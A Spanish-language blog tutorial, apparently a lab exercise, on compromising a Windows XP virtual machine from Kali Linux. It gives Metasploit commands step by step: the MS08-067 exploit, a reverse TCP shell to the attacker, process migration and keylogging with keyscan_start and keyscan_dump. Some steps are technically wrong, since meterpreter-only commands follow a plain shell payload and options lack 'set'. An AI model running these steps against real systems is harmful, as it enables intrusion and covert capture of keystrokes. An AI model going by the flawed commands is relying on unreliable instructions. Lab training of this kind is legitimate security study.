En este tutorial vamos a aprender a realizar ataques con un sistema Kali Linux sobre un sistema con Windows XP en entorno controlado con máquinas virtuales.
Antes de empezar deberías saber...
Una de las ventajas de Kali es el de poder usarse como CD live o vivo y el propio sistema al iniciarlo nos ofrece distintas aplicaciones y herramientas de seguridad.
Si no disponemos de un contrato o licencia para realizar lo que vamos a ver a continuación, no deberías hacerlo, puesto que estaríamos rebasando la línea de lo legal, es por ello que os recomiendo realizarlo en máquinas virtuales en mi caso con Virtual Box.
¿Qué tipos de ataques vamos a realizar?
Los tipos de ataques que vamos a ver a continuación, son:
- Controlar los procesos de un Windows XP remoto
Debemos tener en cuenta que ambos equipos deben pertenecer a la misma red para que puedan verse. A continuación vamos a ver paso a paso como realizar este ataque.
Controlando procesos de un Windows XP desde Kali
Paso 1: Configuración de red de Kali
a) Configuramos la IP para que pueda verse con la máquina virtual de Windows XP
b) Comprobamos la confirmación de la conexión.
Paso 2: Abrir una terminal y ejecutar msfconsole
Abrimos una terminal y ejecutamos msfconsole, con lo que accederemos al framework de metasploit que contiene Kali
Este proceso puede tardar unos minutos. Al finalizar, nos aparecerá un dibujo como el siguiente realizado con caracteres.
Paso 3: Ejecutar el exploit
a) Selecionar el exploit que usaremosEscribiremos en la terminal:
use exploit/windows/smb/ms08_067_netapi
b) Selecionar el payloadEscribiremos en la terminal:
set PAYLOAD windows/shell/reverse_tcp
c) Ver las opciones
Escribiremos en la terminal:
show options
d) Le "diremos" a Kali cuál será la víctima y quién la ejecutará, en nuestro caso RHOST será la IP de Windows XP y LHOST nuestra IP de Kali.
Escribiremos en la terminal:
RHOST <Ip de Windows XP>
LHOST <Ip de Kali>
e) Por último ejecutaremos el exploit:
exploit
f) Comprobaremos que hemos entrado en Windows de forma satisfactoria viendo que estamos navegando en el como vemos en la imagen C:\WINDOWS\system32>
Paso 4: Controlar los procesos y realizar un Keylogger
a) Ver los procesos activos en el Windows remoto:Escribiremos en la terminal:
set PAYLOAD windows/shell/reverse_tcp
exploit
ps
b) Migraremos el proceso gracias al comando migrate y el PID del proceso. En nuestro caso robaremos un proceso con el notepad.
Escribiremos en la terminal:
migrate <PID del proceso a migrar>
c) Escribiremos algo en el notepad o en el proceso que hemos migrado
d) Realizaremos un keylogger para ver lo que ha escrito. Para ello usaremos el comando Keyscan_start para iniciar el keylogger y a raíz de aquí empezará a guardar lo que se escriba en el proceso migrado. Mostraremos con Keyscan_dump lo que se ha escrito.
Escribiremos en la terminal:
keyscan_start
keyscan_dump
Comentarios
Publicar un comentario